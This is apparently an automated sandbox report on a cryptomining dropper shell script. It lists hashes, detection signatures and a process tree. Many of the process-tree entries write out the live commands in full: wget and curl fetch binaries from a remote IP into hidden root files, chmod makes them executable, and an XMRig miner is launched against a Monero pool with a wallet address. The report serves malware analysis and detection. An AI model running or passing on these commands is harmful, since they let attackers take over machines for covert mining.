Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipsel
    image:debian9-mipsel-20240418-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    21/10/2024, 01:53

General

  • Target

    37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh

  • Size

    700B

  • MD5

    c4d089011765cf8fa828d28b6eeeac3e

  • SHA1

    43d933e706b0eefd0db2b5acba19205ebc1af2bd

  • SHA256

    37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19

  • SHA512

    3f55a27fc44062f48d0ee1c11c7b2ece0d3478e89744618d337dd2854b3b68e7e6161d0e38e21b32b4f85a1ee2d2fb523c7b94cc984fdff36ef65a9ddf45bae9

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • File and Directory Permissions Modification 1 TTPs 21 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 12 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
    /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
    1⤵
    PID:718
      • /usr/bin/wget
        wget 205.185.117.101/log2 -O /dev/null
        2⤵
        PID:720
      • /usr/bin/curl
        curl -L 205.185.117.101/log2 -o /dev/null
        2⤵
        • Reads runtime system information
        PID:738
      • /usr/bin/wget
        wget 205.185.117.101/__min__ -O /.__min__
        2⤵
        PID:747
      • /usr/bin/wget
        wget 205.185.117.101/__min__c -O /.__min__c
        2⤵
        PID:824
      • /usr/bin/wget
        wget 205.185.117.101/__min__m -O /.__min__m
        2⤵
        PID:825
      • /bin/chmod
        chmod +x /.__min__
        2⤵
        • File and Directory Permissions Modification
        PID:829
      • /bin/chmod
        chmod +x /.__min__c
        2⤵
        • File and Directory Permissions Modification
        PID:830
      • /bin/chmod
        chmod +x /.__min__m
        2⤵
        • File and Directory Permissions Modification
        PID:831
      • /usr/bin/nproc
        nproc --all
        2⤵
        • Enumerates kernel/hardware configuration
        PID:832
      • /bin/hostname
        hostname
        2⤵
        PID:834
      • /.__min__c
        /.__min__c
        2⤵
        • Executes dropped EXE
        PID:835
      • /.__min__
        /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsel-20240418-en-14 --tls -k
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:837
      • /usr/bin/wget
        wget 205.185.117.101/__min__ -O /.__min__
        2⤵
        PID:840
      • /usr/bin/wget
        wget 205.185.117.101/__min__c -O /.__min__c
        2⤵
        PID:841
      • /usr/bin/wget
        wget 205.185.117.101/__min__m -O /.__min__m
        2⤵
        PID:842
      • /bin/chmod
        chmod +x /.__min__c
        2⤵
        • File and Directory Permissions Modification
        PID:843
      • /bin/chmod
        chmod +x /.__min__m
        2⤵
        • File and Directory Permissions Modification
        PID:844
      • /.__min__c
        /.__min__c
        2⤵
        • Executes dropped EXE
        PID:845
      • /usr/bin/wget
        wget 205.185.117.101/__min__c -O /.__min__c
        2⤵
        PID:847
      • /usr/bin/wget
        wget 205.185.117.101/__min__m -O /.__min__m
        2⤵
        PID:848
      • /bin/chmod
        chmod +x /.__min__c
        2⤵
        • File and Directory Permissions Modification
        PID:849
      • /bin/chmod
        chmod +x /.__min__m
        2⤵
        • File and Directory Permissions Modification
        PID:850
      • /.__min__c
        /.__min__c
        2⤵
        • Executes dropped EXE
        PID:851
      • /usr/bin/wget
        wget 205.185.117.101/__min__c -O /.__min__c
        2⤵
        PID:853
      • /usr/bin/wget
        wget 205.185.117.101/__min__m -O /.__min__m
        2⤵
        PID:854
      • /bin/chmod
        chmod +x /.__min__c
        2⤵
        • File and Directory Permissions Modification
        PID:855
      • /bin/chmod
        chmod +x /.__min__m
        2⤵
        • File and Directory Permissions Modification
        PID:856
      • /.__min__c
        /.__min__c
        2⤵
        • Executes dropped EXE
        PID:857
      • /usr/bin/wget
        wget 205.185.117.101/__min__c -O /.__min__c
        2⤵
        PID:859
      • /usr/bin/wget
        wget 205.185.117.101/__min__m -O /.__min__m
        2⤵
        PID:860
      • /bin/chmod
        chmod +x /.__min__c
        2⤵
        • File and Directory Permissions Modification
        PID:861
      • /bin/chmod
        chmod +x /.__min__m
        2⤵
        • File and Directory Permissions Modification
        PID:862
      • /.__min__c
        /.__min__c
        2⤵
        • Executes dropped EXE
        PID:863
      • /usr/bin/wget
        wget 205.185.117.101/__min__c -O /.__min__c
        2⤵
        PID:865
      • /usr/bin/wget
        wget 205.185.117.101/__min__m -O /.__min__m
        2⤵
        PID:866
      • /bin/chmod
        chmod +x /.__min__
        2⤵
        • File and Directory Permissions Modification
        PID:867
      • /bin/hostname
        hostname
        2⤵
        PID:868
      • /.__min__
        /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsel-20240418-en-14 --tls -k
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:869
      • /usr/bin/wget
        wget 205.185.117.101/__min__ -O /.__min__
        2⤵
        PID:871
      • /bin/chmod
        chmod +x /.__min__c
        2⤵
        • File and Directory Permissions Modification
        PID:872
      • /bin/chmod
        chmod +x /.__min__m
        2⤵
        • File and Directory Permissions Modification
        PID:873
      • /.__min__c
        /.__min__c
        2⤵
        • Executes dropped EXE
        PID:874
      • /usr/bin/wget
        wget 205.185.117.101/__min__c -O /.__min__c
        2⤵
        PID:876
      • /usr/bin/wget
        wget 205.185.117.101/__min__m -O /.__min__m
        2⤵
        PID:877
      • /bin/chmod
        chmod +x /.__min__c
        2⤵
        • File and Directory Permissions Modification
        PID:878
      • /bin/chmod
        chmod +x /.__min__m
        2⤵
        • File and Directory Permissions Modification
        PID:879
      • /.__min__c
        /.__min__c
        2⤵
        • Executes dropped EXE
        PID:880
      • /usr/bin/wget
        wget 205.185.117.101/__min__c -O /.__min__c
        2⤵
        PID:882
      • /usr/bin/wget
        wget 205.185.117.101/__min__m -O /.__min__m
        2⤵
        PID:883
      • /bin/chmod
        chmod +x /.__min__c
        2⤵
        • File and Directory Permissions Modification
        PID:884
      • /bin/chmod
        chmod +x /.__min__m
        2⤵
        • File and Directory Permissions Modification
        PID:885
      • /.__min__c
        /.__min__c
        2⤵
        • Executes dropped EXE
        PID:886
      • /usr/bin/wget
        wget 205.185.117.101/__min__c -O /.__min__c
        2⤵
        PID:888
      • /bin/chmod
        chmod +x /.__min__
        2⤵
        • File and Directory Permissions Modification
        PID:889
      • /bin/hostname
        hostname
        2⤵
        PID:890
      • /.__min__
        /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsel-20240418-en-14 --tls -k
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:891
      • /usr/bin/wget
        wget 205.185.117.101/__min__ -O /.__min__
        2⤵
        PID:893
      • /usr/bin/wget
        wget 205.185.117.101/__min__m -O /.__min__m
        2⤵
        PID:894
      • /bin/chmod
        chmod +x /.__min__c
        2⤵
        • File and Directory Permissions Modification
        PID:895
      • /bin/chmod
        chmod +x /.__min__m
        2⤵
        • File and Directory Permissions Modification
        PID:896
      • /.__min__c
        /.__min__c
        2⤵
        • Executes dropped EXE
        PID:897
      • /usr/bin/wget
        wget 205.185.117.101/__min__c -O /.__min__c
        2⤵
        PID:899
      • /usr/bin/wget
        wget 205.185.117.101/__min__m -O /.__min__m
        2⤵
        PID:900

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /.__min__

    Filesize

    8.2MB

    MD5

    8f96e8b4e9d26884c776c1b42a70bae5

    SHA1

    53a4166052211abf77e1edf0d71c7a6faae12cc5

    SHA256

    5e5fd0bc5f1bd663d7ccc2695c2b56bd382df3c7fdac605eb0ce3c0d5df24dc4

    SHA512

    4709a5ee74cf3e91472b64891eaf9cd7cd8bde6059be6fd892863274c505fd3cf5f5631d66d01ab645406adb76b6123d287d97e90a6c08bf8f8a935a6624dcec

  • /.__min__

    Filesize

    5.2MB

    MD5

    dc32e92b600c8e7f2c3fb65e7ea6cbac

    SHA1

    be717f5490537cb5e222c178f0bd93534a166e67

    SHA256

    939d145d0baa07b0febb17d5cff0765a5f27f5500b520ed66c6e2205a697440a

    SHA512

    ece31e619ce7e6dcdca4a6c65a1ce689a30663a8e630eea316d79b3ad70d5b8c4dc28d30b836c27e8151e1d07ea62377ae8765d0f6144a31a91559c171b6022b

  • /.__min__c

    Filesize

    1.6MB

    MD5

    d3e378df1f5f920faaf9ef9e14a54f55

    SHA1

    b039ff3865762819392cec53eeac7c8ee0a630c3

    SHA256

    58fa45ce3665fd665bde9589297a5a34c8df403e8732eb7bdc77d00c669fac29

    SHA512

    40ad13e858412d4d809d5eccb55c4e31ab65183f9064daea2d2b5e5bb311de4d43121337bb523ff1128cb9bd61319367de7e62f96ed2065b680f53371623d358

  • /.__min__m

    Filesize

    2.9MB

    MD5

    d98aa7684a42d8197b0eb2946c6d4fab

    SHA1

    a5a7cb1c92f7c9ce302caaaab7d52f70ce7564da

    SHA256

    bacd68209fed7455e465c223d55af9574e23616f94e52c1c10ee7a1b8673898e

    SHA512

    e2cce2d0e96546bfe233e8294d49ed020db89c2a5968e57a2d84b9cd02cf71060805d765050792d81d0a238cf22eb41a030d6364256115bba5f43cb40f99b1ee